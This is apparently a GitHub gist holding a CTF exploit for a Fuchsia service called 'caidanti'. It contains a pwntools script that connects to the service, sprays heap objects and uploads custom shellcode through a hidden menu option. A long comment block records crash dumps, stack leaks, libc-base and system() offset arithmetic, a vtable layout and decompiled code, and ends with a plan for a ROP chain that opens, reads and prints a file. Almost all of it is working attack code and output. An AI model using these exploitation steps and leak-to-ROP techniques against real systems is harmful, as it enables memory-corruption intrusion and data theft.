Skip to content

Instantly share code, notes, and snippets.

@st4rk
Created September 16, 2019 01:12
Show Gist options
  • Save st4rk/e5b86b4cb56813a25027738ffeac23cc to your computer and use it in GitHub Desktop.
Save st4rk/e5b86b4cb56813a25027738ffeac23cc to your computer and use it in GitHub Desktop.
from pwn import *
import struct
context(arch='amd64')
context.log_level = 'debug'
SHELLCODE_NAME = 'shell.bin'
p = remote('fe80::5054:ff:fe63:5e7a%qemu', 31337)
def create_new_secret(i, size):
p.sendline('1')
p.recvuntil('Key: ')
p.sendline(struct.pack('B', 0x41 + i) * size)
p.recvuntil('Initial content: ')
p.sendline(struct.pack('B', 0x43 + i) * size)
p.recvuntil('114514. Bring your own Cài Dān Tí')
def send_shellcode():
print('[-] sending shellcode')
p.sendline('114514')
p.recvuntil('Your code size: ')
f = open(SHELLCODE_NAME, 'rb')
shellcode = f.read()
f.close
p.sendline(str(len(shellcode)))
print('[-] size: 0x%X' % len(shellcode))
for i in shellcode:
print('[-] sending byte: 0x%X' % i)
p.send(struct.pack('B', i))
# get ready for sending the commands
p.recvuntil('114514. Bring your own Cài Dān Tí')
create_new_secret(0, 0x10)
for i in range(1, 15):
create_new_secret(i, 0x80)
send_shellcode()
p.interactive()
"""
f = open(SHELLCODE_NAME, 'rb')
shellcode = f.read()
f.close
for i in shellcode:
print('[-] hex data: 0x%X' % i)
print('[-] size: 0x%X' % len(shellcode))
[02122.186] 01413:02049> <== sw breakpoint, PC at 0x32d40b10d001
[02122.186] 01413:02049> CS: 0 RIP: 0x32d40b10d001 EFL: 0x246 CR2: 0
[02122.186] 01413:02049> RAX: 0 RBX: 0x2 RCX: 0x50b45785098a RDX: 0
[02122.186] 01413:02049> RSI: 0 RDI: 0 RBP: 0x7bd6f9ce3fe RSP: 0x43874d86ef68
[02122.186] 01413:02049> R8: 0 R9: 0 R10: 0 R11: 0x206
[02122.186] 01413:02049> R12: 0x7bd6f9d03a3 R13: 0x7045734effc0 R14: 0x7bd6f9cdea0 R15: 0x32d40b10d000
[02122.187] 01413:02049> fs.base: 0x129a0de22b38 gs.base: 0
[02122.187] 01413:02049> errc: 0
[02122.187] 01413:02049> bottom of user stack:
[02122.187] 01413:02049> 0x000043874d86ef68: 6f9d4205 000007bd 00000000 00000000 |.B.o............|
[02122.187] 01413:02049> 0x000043874d86ef78: c8748f70 000050e6 8c5f3eb0 000074ac |p.t..P...>_..t..|
[02122.187] 01413:02049> 0x000043874d86ef88: 734effc0 00007045 734effd0 00007045 |..NsEp....NsEp..|
[02122.187] 01413:02049> 0x000043874d86ef98: 00000001 00000000 4d86eff0 00004387 |...........M.C..|
[02122.187] 01413:02049> 0x000043874d86efa8: 8c5ab7b8 000074ac 734effd0 00007045 |..Z..t....NsEp..|
[02122.187] 01413:02049> 0x000043874d86efb8: 00000001 00000000 00000000 00000000 |................|
[02122.187] 01413:02049> 0x000043874d86efc8: 00000024 00000000 8c5634a0 000074ac |$........4V..t..|
[02122.187] 01413:02049> 0x000043874d86efd8: 00000009 00000000 f18e14b3 00000000 |................|
[02122.187] 01413:02049> 0x000043874d86efe8: c8748e80 000050e6 c8748fd0 000050e6 |..t..P....t..P..|
[02122.187] 01413:02049> 0x000043874d86eff8: 00000000 00000000 |................|
[02122.187] 01413:02049> arch: x86_64
[02122.193] 01413:02049> dso: id=3bbb161daecb4232 base=0x74ac8c546000 name=libc.so
[02122.193] 01413:02049> dso: id=6fe653e43b2b5e45 base=0x6e8abbcf8000 name=libc++abi.so.1
[02122.193] 01413:02049> dso: id=c200204d0d41e6bb base=0x6273815a7000 name=libunwind.so.1
[02122.193] 01413:02049> dso: id=5d8e98cee74051fe base=0x50b457849000 name=<vDSO>
[02122.193] 01413:02049> dso: id=5aa1a22b01f749ba base=0x491885fa1000 name=libasync-default.so
[02122.193] 01413:02049> dso: id=0e2ccaeccb00d6ab base=0x25879c2c2000 name=libfdio.so
[02122.193] 01413:02049> dso: id=c27f348845222148 base=0xf2d0e849000 name=libc++.so.2
[02122.193] 01413:02049> dso: id=2aa6571acee24348 base=0x7bd6f9cd000 name=app:/pkg/bin/caidanti
idea:
000076ac353f30a0
read the stack (RSP), get libc address and calculate address to system and call it
target: SP + 0x40
libc_base =
0x74ac8c5f3eb0 - 0x74ac8c546000
0x74ac8c5634a0
0x74ac8c546000
; start_main
0x74ac8c5ab7b8 - 0x74ac8c546000
8c5634a0
0x117B8 -- _text start
_text_start to system add + 0x35060
.text:00000000000657B6 call qword ptr [p]
.text:00000000000657B8 mov edi, eax ; status
.text:00000000000657BA call _exit
0x54000
; calculate system address
MOV RAX, 0x35030 ; 0x35060
ADD RBX, RAX
;LEA RDI, [REL pop_shell]
MOV RDI, 0
JMP RBX
[01349.773] 01413:01988> {{{bt:1:0x2547f1dee060:sp 0x221dc0fb7f68}}}
[01349.773] 01413:01988> crashsvc: failed to pass exception to handler [thread 12353.12355]: ZX_ERR_PEER_CLOSED (-24)
[01353.018] 01413:01988> <== fatal exception: process /pkg/bin/caidanti[12526] thread initial-thread[12528]
[01353.018] 01413:01988> <== read not-present page fault, PC at 0x7fbb00a5022b
[01353.018] 01413:01988> CS: 0 RIP: 0x7fbb00a5022b EFL: 0x202 CR2: 0xb2
[01353.018] 01413:01988> RAX: 0x10 RBX: 0x4c9545f74c70 RCX: 0x26 RDX: 0x10
[01353.018] 01413:01988> RSI: 0x1 RDI: 0x4c9545f74c70 RBP: 0x4c9545f74f58 RSP: 0x4c9545f74f18
[01353.018] 01413:01988> R8: 0x10 R9: 0 R10: 0x7fbb00a50200 R11: 0x286
[01353.018] 01413:01988> R12: 0x5d7fa7e0e3a3 R13: 0x26 R14: 0x1 R15: 0x10
[01353.018] 01413:01988> fs.base: 0x48dbf5645b38 gs.base: 0
[01353.018] 01413:01988> errc: 0x4
[01353.018] 01413:01988> bottom of user stack:
0x7fbb00a5022b
0x7fbb00a50200
turns out I need to use open from fdio, let's calculate it
[03070.903] 01413:01988> <== sw breakpoint, PC at 0xff931234002
[03070.903] 01413:01988> CS: 0 RIP: 0xff931234002 EFL: 0x246 CR2: 0
[03070.903] 01413:01988> RAX: 0 RBX: 0x7b RCX: 0x7eab62dd698a RDX: 0
[03070.903] 01413:01988> RSI: 0 RDI: 0 RBP: 0x6cf45fc223fe RSP: 0x35c1272f3f68
[03070.903] 01413:01988> R8: 0 R9: 0 R10: 0 R11: 0x206
[03070.903] 01413:01988> R12: 0x6cf45fc243a3 R13: 0x2d417260fc0 R14: 0x6cf45fc21ea0 R15: 0xff931234000
[03070.903] 01413:01988> fs.base: 0x6b4f2ffcab38 gs.base: 0
[03070.903] 01413:01988> errc: 0
[03070.903] 01413:01988> bottom of user stack:
[03070.903] 01413:01988> 0x000035c1272f3f68: 5fc28205 00006cf4 00000000 00000000 |..._.l..........|
[03070.903] 01413:01988> 0x000035c1272f3f78: 5a6d0f70 00005061 1825eeb0 00004bf4 |p.mZaP....%..K..|
[03070.903] 01413:01988> 0x000035c1272f3f88: 17260fc0 000002d4 17260fd0 000002d4 |..&.......&.....|
[03070.903] 01413:01988> 0x000035c1272f3f98: 00000001 00000000 272f3ff0 000035c1 |.........?/'.5..|
[03070.903] 01413:01988> 0x000035c1272f3fa8: 182167b8 00004bf4 17260fd0 000002d4 |.g!..K....&.....|
[03070.903] 01413:01988> 0x000035c1272f3fb8: 00000001 00000000 00000000 00000000 |................|
[03070.903] 01413:01988> 0x000035c1272f3fc8: 00000024 00000000 181ce4a0 00004bf4 |$............K..|
[03070.903] 01413:01988> 0x000035c1272f3fd8: 00000009 00000000 89af5ceb 00000000 |.........\......|
[03070.903] 01413:01988> 0x000035c1272f3fe8: 5a6d0e80 00005061 5a6d0fd0 00005061 |..mZaP....mZaP..|
[03070.903] 01413:01988> 0x000035c1272f3ff8: 00000000 00000000 |................|
[03070.903] 01413:01988> arch: x86_64
[03070.906] 01413:01988> dso: id=5d8e98cee74051fe base=0x7eab62dcf000 name=<vDSO>
[03070.906] 01413:01988> dso: id=2aa6571acee24348 base=0x6cf45fc21000 name=app:/pkg/bin/caidanti
[03070.906] 01413:01988> dso: id=c200204d0d41e6bb base=0x54436ae41000 name=libunwind.so.1
[03070.906] 01413:01988> dso: id=3bbb161daecb4232 base=0x4bf4181b1000 name=libc.so
[03070.906] 01413:01988> dso: id=c27f348845222148 base=0x46a69fb49000 name=libc++.so.2
[03070.906] 01413:01988> dso: id=6fe653e43b2b5e45 base=0x3a571be28000 name=libc++abi.so.1
[03070.906] 01413:01988> dso: id=5aa1a22b01f749ba base=0x11097e751000 name=libasync-default.so
[03070.906] 01413:01988> dso: id=0e2ccaeccb00d6ab base=0xfd38fc51000 name=libfdio.so
0x6cf45fc28205
0x6cf45fc21000
0x7205
0x600B
offset to base address: 0x11FA
vtable + 0x20 == read_content of secret
LOAD:0000000000011020 u_obj_vtable dq offset u_obj_ctor ; DATA XREF: create_service_object+2C↑o
LOAD:0000000000011028 dq offset u_obj_dtor
LOAD:0000000000011030 dq offset sub_7590
LOAD:0000000000011038 dq offset sub_7750
LOAD:0000000000011040 dq offset sub_79C0 -- update_content/read_content
LOAD:0000000000011048 dq offset sub_7C70
LOAD:0000000000011050 dq offset sub_7E40
LOAD:0000000000011058 dq offset sub_7F00
LOAD:0000000000011060 unk_11060 db 3
v12 = *(_QWORD *)(stack_buffer - 56);
v13 = *((unsigned __int8 *)input_buffer + 23);
if ( (v13 & 0x80u) != 0LL )
v13 = *((_QWORD *)input_buffer + 1);
*(_QWORD *)(v12 + 16) = v13;
*(_QWORD *)(v12 + 24) = 0xFFFFFFFFFFFFFFFFLL;
v14 = *((unsigned __int8 *)input_buffer + 23);
v15 = v23;
if ( (v14 & 0x80u) != 0LL )
v14 = *((_QWORD *)input_buffer + 1);
v22 = stack_buffer - 88;
v16 = (void *)(*(_QWORD *)(stack_buffer - 56) + sub_8E60(stack_buffer - 56, v14, v10, v11, stack_buffer));
v17 = *((unsigned __int8 *)input_buffer + 23);
if ( (v17 & 0x80u) != 0LL )
{
v18 = *(void **)input_buffer;
v17 = *((_QWORD *)input_buffer + 1);
}
else
{
v18 = input_buffer;
}
v19 = (_QWORD *)(stack_buffer - 8);
memcpy(v16, v18, v17);
sub_8F90(stack_buffer -
case 5: // list secrets
*((_OWORD *)stack_buffer - 2) = 0LL;
*((_QWORD *)stack_buffer - 2) = 0LL;
v10 = (*(__int64 (__fastcall **)(__int64, char *))(*(_QWORD *)service_obj + 0x18LL))(
service_obj,
stack_buffer - 32);
[05362.890] 01413:02251> crashsvc: failed to pass exception to handler [thread 14259.14261]: ZX_ERR_PEER_CLOSED (-24)
[05392.322] 01413:02251> <== fatal exception: process /pkg/bin/caidanti[14598] thread initial-thread[14600]
[05392.322] 01413:02251> <== sw breakpoint, PC at 0x1a20970a516c
[05392.322] 01413:02251> CS: 0 RIP: 0x1a20970a516c EFL: 0x206 CR2: 0
[05392.322] 01413:02251> RAX: 0x4141414141414141 RBX: 0x2bfecd3be000 RCX: 0x564fa688c975 RDX: 0
[05392.322] 01413:02251> RSI: 0x499eb04a6000 RDI: 0 RBP: 0x2bfecd3b93fe RSP: 0x499eb04a6000
[05392.322] 01413:02251> R8: 0 R9: 0 R10: 0 R11: 0x206
[05392.322] 01413:02251> R12: 0x2bfecd3c8cc0 R13: 0x79fab848dfc0 R14: 0x2bfecd3ca140 R15: 0x1a20970a5000
[05392.322] 01413:02251> fs.base: 0x62980c45ab38 gs.base: 0
[05392.322] 01413:02251> errc: 0
[05392.322] 01413:02251> bottom of user stack:
[05392.322] 01413:02251> 0x0000499eb04a6000: 41414141 41414141 00000000 00000000 |AAAAAAAA........|
[05392.322] 01413:02251> 0x0000499eb04a6010: 00000000 00000000 00000000 00000000 |................|
[05392.322] 01413:02251> 0x0000499eb04a6020: 00000000 00000000 00000000 00000000 |................|
[05392.322] 01413:02251> 0x0000499eb04a6030: 353f30a0 000076ac 00000000 00000000 |.0?5.v..........|
[05392.322] 01413:02251> 0x0000499eb04a6040: 00000000 00000000 00000000 00000000 |................|
[05392.322] 01413:02251> 0x0000499eb04a6050: d7659000 00001530 00000000 00000000 |..e.0...........|
[05392.322] 01413:02251> 0x0000499eb04a6060: 5fa56fb0 00003641 00000001 00000000 |.o._A6..........|
[05392.323] 01413:02251> 0x0000499eb04a6070: 41414141 41414141 41414141 41414141 |AAAAAAAAAAAAAAAA|
[05392.323] 01413:02251> 0x0000499eb04a6080: 00000000 10000000 41414141 41414141 |........AAAAAAAA|
[05392.323] 01413:02251> 0x0000499eb04a6090: 41414141 41414141 00000000 00000000 |AAAAAAAA........|
[05392.323] 01413:02251> 0x0000499eb04a60a0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60b0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60c0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60d0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60e0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60f0: 00000000 00000000 00000000 00000000 |................|
SHARED MEMORY + 0x30 == vtable_for_unk_obj
vtable_for_unk_obj - 0xE0A0 == .text base
[06283.807] 01413:02251> 0x00007d293f39dfe0: c5e415df 00000000 6797ce60 0000424c |........`..gLB..|
[06283.807] 01413:02251> 0x00007d293f39dff0: 6797cfd0 0000424c 00000000 00000000 |...gLB..........|
[06283.807] 01413:02251> arch: x86_64
[06283.819] 01413:02251> dso: id=c09087b32b943945 base=0x60785719e000 name=app:/pkg/bin/caidanti-storage-servi
[06283.819] 01413:02251> dso: id=0e2ccaeccb00d6ab base=0x586c82a9e000 name=libfdio.so
[06283.819] 01413:02251> dso: id=5d8e98cee74051fe base=0x5616838b0000 name=<vDSO>
[06283.819] 01413:02251> dso: id=6fe653e43b2b5e45 base=0x54da4878e000 name=libc++abi.so.1
[06283.819] 01413:02251> dso: id=3bbb161daecb4232 base=0x50e7f3acf000 name=libc.so
[06283.819] 01413:02251> dso: id=c200204d0d41e6bb base=0x18f24db0f000 name=libunwind.so.1
[06283.819] 01413:02251> dso: id=5aa1a22b01f749ba base=0xe0aa5043000 name=libasync-default.so
[06283.819] 01413:02251> dso: id=c27f348845222148 base=0x18ded4d4000 name=libc++.so.2
[06283.819] 01413:02251> {{{reset}}}
[06283.759] 01413:02251> bottom of user stack:
[06283.759] 01413:02251> 0x000026c776304000: 76304008 000026c7 571a32c7 00006078 |.@0v.&...2.Wx`..|
[06283.759] 01413:02251> 0x000026c776304010: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c776304020: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c776304030: 571b10a0 00006078 00000000 00000000 |...Wx`..........|
[06283.759] 01413:02251> 0x000026c776304040: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c776304050: 63b6d000 00007a5f 00000000 00000000 |...c_z..........|
[06283.759] 01413:02251> 0x000026c776304060: 52255fb0 00000d41 00000001 00000000 |._%RA...........|
[06283.759] 01413:02251> 0x000026c776304070: 41414141 41414141 41414141 41414141 |AAAAAAAAAAAAAAAA|
[06283.759] 01413:02251> 0x000026c776304080: 00000000 10000000 41414141 41414141 |........AAAAAAAA|
[06283.759] 01413:02251> 0x000026c776304090: 41414141 41414141 00000000 00000000 |AAAAAAAA........|
[06283.759] 01413:02251> 0x000026c7763040a0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040b0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040c0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040d0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040e0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040f0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> arch: x86_64
[06283.762] 01413:02251> dso: id=2aa6571acee24348 base=0x7ff034b1a000 name=app:/pkg/bin/caidanti
[06283.762] 01413:02251> dso: id=5d8e98cee74051fe base=0x77b728d7c000 name=<vDSO>
[06283.762] 01413:02251> dso: id=c27f348845222148 base=0x771ca9160000 name=libc++.so.2
[06283.762] 01413:02251> dso: id=3bbb161daecb4232 base=0x76f36dee7000 name=libc.so
[06283.762] 01413:02251> dso: id=c200204d0d41e6bb base=0x56bc198a5000 name=libunwind.so.1
[06283.762] 01413:02251> dso: id=5aa1a22b01f749ba base=0x302dd59ae000 name=libasync-default.so
[06283.762] 01413:02251> dso: id=0e2ccaeccb00d6ab base=0x220f479fb000 name=libfdio.so
[06283.762] 01413:02251> dso: id=6fe653e43b2b5e45 base=0xf84964c0000 name=libc++abi.so.1
[06283.762] 01413:02251> {{{reset}}}
[06283.820] 01413:02251> {{{module:0:libc++.so.2:elf:c27f348845222148}}}
[06283.822] 01413:02251> {{{mmap:0x18ded4d4000:0x53000:load:0:r:0}}}
[06283.822] 01413:02251> {{{mmap:0x18ded527000:0x76000:load:0:rx:0x53000}}}
[06283.822] 01413:02251> {{{mmap:0x18ded59d000:0x5000:load:0:rw:0xc9000}}}
[06283.822] 01413:02251> {{{mmap:0x18ded5a2000:0x3000:load:0:rw:0xce000}}}
[06283.822] 01413:02251> {{{module:0x1:libasync-default.so:elf:5aa1a22b01f749ba}}}
[06283.822] 01413:02251> {{{mmap:0xe0aa5043000:0x1000:load:0x1:r:0}}}
[06283.823] 01413:02251> {{{mmap:0xe0aa5044000:0x1000:load:0x1:rx:0x1000}}}
[06283.823] 01413:02251> {{{mmap:0xe0aa5045000:0x1000:load:0x1:rw:0x2000}}}
[06283.823] 01413:02251> {{{module:0x2:libunwind.so.1:elf:c200204d0d41e6bb}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db0f000:0x4000:load:0x2:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db13000:0x6000:load:0x2:rx:0x4000}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db19000:0x1000:load:0x2:rw:0xa000}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db1a000:0x1000:load:0x2:rw:0xb000}}}
[06283.823] 01413:02251> {{{module:0x3:libc.so:elf:3bbb161daecb4232}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3acf000:0x54000:load:0x3:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3b23000:0x57000:load:0x3:rx:0x54000}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3b7a000:0x2000:load:0x3:rw:0xab000}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3b7c000:0x3000:load:0x3:rw:0xad000}}}
[06283.823] 01413:02251> {{{module:0x4:libc++abi.so.1:elf:6fe653e43b2b5e45}}}
[06283.823] 01413:02251> {{{mmap:0x54da4878e000:0x16000:load:0x4:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x54da487a4000:0x1b000:load:0x4:rx:0x16000}}}
[06283.823] 01413:02251> {{{mmap:0x54da487bf000:0x3000:load:0x4:rw:0x31000}}}
[06283.823] 01413:02251> {{{mmap:0x54da487c2000:0x1000:load:0x4:rw:0x34000}}}
[06283.823] 01413:02251> {{{module:0x5:libzircon.so:elf:5d8e98cee74051fe}}}
[06283.823] 01413:02251> {{{mmap:0x5616838b0000:0x7000:load:0x5:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x5616838b7000:0x1000:load:0x5:rx:0x7000}}}
[06283.823] 01413:02251> {{{module:0x6:libfdio.so:elf:0e2ccaeccb00d6ab}}}
[06283.823] 01413:02251> {{{mmap:0x586c82a9e000:0xe000:load:0x6:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x586c82aac000:0x31000:load:0x6:rx:0xe000}}}
[06283.823] 01413:02251> {{{mmap:0x586c82add000:0x3000:load:0x6:rw:0x3f000}}}
[06283.823] 01413:02251> {{{mmap:0x586c82ae0000:0x4000:load:0x6:rw:0x42000}}}
[06283.823] 01413:02251> {{{module:0x7:<VMO#16036=caidanti-storage-service>:elf:c09087b32b943945}}}
[06283.823] 01413:02251> {{{mmap:0x60785719e000:0x5000:load:0x7:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x6078571a3000:0xe000:load:0x7:rx:0x5000}}}
[06283.823] 01413:02251> {{{mmap:0x6078571b1000:0x1000:load:0x7:rw:0x13000}}}
[06283.823] 01413:02251> {{{mmap:0x6078571b2000:0x1000:load:0x7:rw:0x14000}}}
[06283.823] 01413:02251> {{{bt:1:0x6078571a3276:sp 0x7d293f39df40}}}
[06283.824] 01413:02251> {{{bt:2:0x50e7f3b347b8:sp 0x7d293f39dfb0}}}
[06283.825] 01413:02251> {{{bt:3:0:sp 0x7d293f39e000}}}
00006078571b10a0
000017c7a44c99b0
STRATEGY:
1. ROP chain
2. open
3. read
4. print using write
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment